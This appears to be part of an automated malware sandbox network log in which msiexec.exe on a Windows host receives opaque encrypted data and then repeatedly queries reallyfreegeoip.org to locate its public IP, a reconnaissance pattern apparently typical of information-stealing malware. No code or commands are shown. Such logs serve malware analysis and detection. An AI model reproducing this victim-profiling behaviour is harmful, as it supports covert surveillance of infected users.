2024-12-17 12:21:41 UTC	1390	IN	Data Raw: 39 a2 38 a1 89 f2 1a 4e e6 3c 62 31 d2 aa c8 bc cf a8 ae cb 09 8a 01 62 4c 79 b5 84 71 04 2d df c1 71 60 17 b0 df 41 39 46 66 41 18 f4 74 a8 17 05 0c 86 dd 02 99 6e ea 60 99 df 1a 85 86 5d 78 30 8f f6 dc df 83 b1 cd c1 43 49 77 6d 63 90 6a 18 f6 54 24 e9 be 38 16 1e f6 d4 d0 40 61 b1 17 e7 7a b6 a6 3c 7e ab 3c d0 d2 87 a7 db b8 74 50 6b c5 0f cd 95 d0 b3 27 f2 54 66 3d 1a 94 45 b0 a0 d8 24 53 12 da d8 39 6d 6d 83 82 f4 57 06 80 60 f5 4b 3d 9b bd 8c 08 3b f7 0f a2 4b 74 00 c9 2b 95 43 30 4c 7a 0e 53 03 37 fd c6 21 b8 f1 84 2d fe 34 b7 e2 f2 d0 bf 24 59 e2 e3 43 24 71 1a 66 01 3b 5c a4 af 54 d2 91 05 d0 2d 07 50 a4 95 88 48 32 0f 3e 39 ee 87 11 b9 e3 54 1b c4 ae 80 aa b3 2b d1 73 58 a2 09 a1 ec d4 07 9c 1d f3 53 64 64 a4 5e d5 81 a6 d1 16 e3 6d 02 36 45 f4 Data Ascii: 98N<b1bLyq-q`A9FfAtn`]x0CIwmcjT$8@az<~<tPk'Tf=E$S9mmW`K=;Kt+C0LzS7!-4$YC$qf;\T-PH2>9T+sXSdd^m6E
2024-12-17 12:21:41 UTC	1390	IN	Data Raw: cf 29 66 d4 cd 2c 23 38 f2 dd ac 46 18 10 b5 22 d5 d7 4d 67 16 b0 82 d6 72 0b b5 6b 41 db cf ef d4 b3 8f 2b 4a 42 39 ba 8c a0 63 2e 79 08 80 43 88 8a 56 4d be d0 b8 29 d2 10 06 8f 69 b5 9c fc eb a3 55 22 ce 29 14 19 d1 3d 4f fb 2f dc 13 87 aa 0e f0 95 5d a0 6f bd b1 4b c8 72 34 d6 75 54 bf 12 1a b6 b0 d4 e0 91 98 fa f5 b0 ab c3 1e 14 33 80 9a 2b 63 1b ab dc fd 3b 54 5f b4 4b df b9 db d8 e8 ef 9e 0d b7 0b 76 e1 6d 75 48 39 5b fa 67 61 74 91 5b 43 8c 1c e2 29 87 1a 95 80 9d ba 5d c2 36 4a 8d de aa cb 4e c8 a1 c1 ca 77 bd 0b 62 94 d5 f1 a3 59 40 3b f7 4a 62 64 1d 8e 43 40 2a 69 aa 07 32 a8 69 25 57 05 72 b5 f8 14 ef 20 ab 62 e9 0d 29 ba 2f e9 78 3a 93 aa f8 d4 f4 2e c7 f8 f9 e9 52 74 63 87 6a 18 f6 84 30 f1 cc 73 03 36 07 76 f5 51 09 6f 16 f4 78 05 85 19 3c Data Ascii: )f,#8F"MgrkA+JB9c.yCVM)iU")=O/]oKr4uT3+c;T_KvmuH9[gat[C)]6JNwbY@;JbdC@*i2i%Wr b)/x:.Rtcj0s6vQox<
2024-12-17 12:21:41 UTC	1390	IN	Data Raw: 32 44 ed f2 6c a0 43 7e 6b 88 6a 01 fb 57 05 7d 11 5b 49 12 0b 0d ea ea ce 3c a3 c9 e8 50 37 04 5a cb e7 15 83 ac 4b 86 60 54 ec 23 d5 50 62 eb b5 12 83 7d e6 ca b1 ef 84 4a 80 e0 27 2f d8 ea df 22 ab dd 18 50 58 a5 52 4d d3 02 3a 6f 38 47 74 95 f4 e0 41 4c 25 49 c6 65 8e 45 fb d6 53 2b 69 03 43 86 87 bf f8 fe 94 2e c2 10 20 9c b3 24 d8 6a 8e d3 14 4c 92 18 d4 64 21 0f 73 3e 6a 76 f7 0a 31 23 f1 c1 35 d6 2a 67 74 7f 95 a8 a8 e3 cf d6 20 47 3d 5d 35 51 4e 6d 11 f2 ea f5 2c 22 19 46 8a 8a 22 23 63 17 77 60 da e2 19 36 ba 20 f7 c8 5c 27 16 09 bd 6d ba 6f e5 c2 2b 4a 4c f4 c3 96 d2 52 3e 5b 63 af 26 93 f4 77 68 a8 a6 40 1b ce 12 ec bc 7e ed 8a d4 9e a9 f7 0d c5 4e e4 20 d1 4d e9 ac 04 b3 2b f7 bc 22 d3 b0 47 d8 42 40 b0 28 7c 4b 57 ef a3 5e ac 31 1a b6 b0 d4 Data Ascii: 2DlC~kjW}[I<P7ZK`T#Pb}J'/"PXRM:o8GtAL%IeES+iC. $jLd!s>jv1#5*gt G=]5QNm,"F"#cw`6 \'mo+JLR>[c&wh@~N M+"GB@(\|KW^1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49784	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:21:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:21:48 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426877 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=It0h6fDo8owk92j5F12lRGghmCD7hmfJ%2B9P4NO5%2ByBvIAWGe%2FqLch9zLrKfF6aFRco3xWQ8B%2FyO3uXrvk71XcAQXdc7DORDVg1zmWJpRPEomlECMF7EqmaYeE6qLPVWuF3xUBEOV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36dffee8dc41f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1704&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1672394&cwnd=229&unsent_bytes=0&cid=d9870dd42ac2360d&ts=458&x=0"
2024-12-17 12:21:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49790	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:21:49 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 12:21:50 UTC	874	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426879 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeggHvHPZ6GKQcOhRmirA8lGjZa83fgLqagvzVJiKFve1bwh3QQYnP5T1bLegfAndqpVDZvsaF3FDn0hrloJm1kWDw%2F7RyAiEgNXQ7erKNHjeeemrU9kI%2Bp8TfZ5Bb0Ww1yJKyNi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e00b7ba343ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1612&rtt_var=610&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1784841&cwnd=203&unsent_bytes=0&cid=f418aab08f252da7&ts=454&x=0"
2024-12-17 12:21:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49797	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:21:52 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:21:53 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426881 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELQRpmAA9tuqpjQ5NEP%2FWkNcQX6i19wH8dYdVrnccYxuKCjVTTPBelH19YP6m4xz4p8rCc8Ej29ld8qfg%2BU7pvO%2FgRzUuwyfc4kf4LLM8hzd%2FZllfiUJZ1C4Ful8QvwPWJ4DNHee"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e01d791a4258-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1596&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1796923&cwnd=181&unsent_bytes=0&cid=9a4830ddf2cdd478&ts=453&x=0"
2024-12-17 12:21:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49808	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:21:56 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:21:56 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:56 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426885 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1cvTudLvy0L6xBGi5hLuNrCtk4Lhkw2W2skUlIDTGFt7WPbi8jylauciF1eDynRsINSjMK0G6DA0EIT6WxjHoKWmtCwg%2BGdhGuJM26c%2BtEFPA5HiksKB%2F23FOBW6I%2BwaguBC8lA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e033687d43e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1728&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1613259&cwnd=247&unsent_bytes=0&cid=8f49b00c8ba04f1d&ts=452&x=0"
2024-12-17 12:21:56 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49815	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:21:59 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:21:59 UTC	884	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:21:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426888 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rOejd%2BdI9bWj0kpMoPpMSOQM6IUpdBlZewmHY7SDnGg3fYBY1fpzwss56jKBSYlr092uqZ9z3MiMcgeYO1%2FG6w%2FMPlPt6%2FnNfPdReJlSV3%2F%2F5356A%2BSkmLb7aJ3Kh1LJjzllykRO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e04588074264-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1595&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=220&unsent_bytes=0&cid=a7de6a8653dbe261&ts=454&x=0"
2024-12-17 12:21:59 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49823	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:22:01 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 12:22:02 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426891 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQDRpMyWTTcf6LFrCJoe79NDSqko52pSEn6ZASiJshGUPylmd3gT0uJnsmAkiaLa0e0%2BWV%2Fgdr%2F2V1qJZrpYJnCPgYOHlkmEQN3E8NZkO05K6PnNbRXNkoh7fJBDBqjyC%2BUuRUCD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e0578c7e19c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1855&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1574123&cwnd=146&unsent_bytes=0&cid=9880b4d4c29986b7&ts=455&x=0"
2024-12-17 12:22:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49834	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:22:04 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 12:22:05 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426894 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BxX8Kuydj1H67yr4%2FBHh1cMU%2F96vcrP0pZCidgU%2BYZSVKUwte3lAVGYZZROMziWF592sUMNUTdSpccd7XsKp21phWWu49e5l%2BP1Zli5OnY83CI%2FUxa56YhJtp1XUwdlTKNMLqYuB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e0699c5f8c2d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2088&min_rtt=2025&rtt_var=805&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1441975&cwnd=247&unsent_bytes=0&cid=6d6996db7f788749&ts=457&x=0"
2024-12-17 12:22:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49841	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:22:07 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 12:22:08 UTC	886	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426897 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsasZ24Dg4l%2FQ48JX551RTPrJaR27RdHHb2P6s9tgPYSd2iApHtenW9588w8wP4mLZbAry0CPJu6%2BZTWMnB8B1hnJwmnRwuA3u%2Bl0Jb54%2BVaGMST7MM6kk%2FsmP%2B9ohg%2Fu%2FVqXQJ0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e07c1fa578db-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=698&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1569048&cwnd=237&unsent_bytes=0&cid=96e840be20eeeb5f&ts=456&x=0"
2024-12-17 12:22:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49848	104.21.67.152	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:22:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
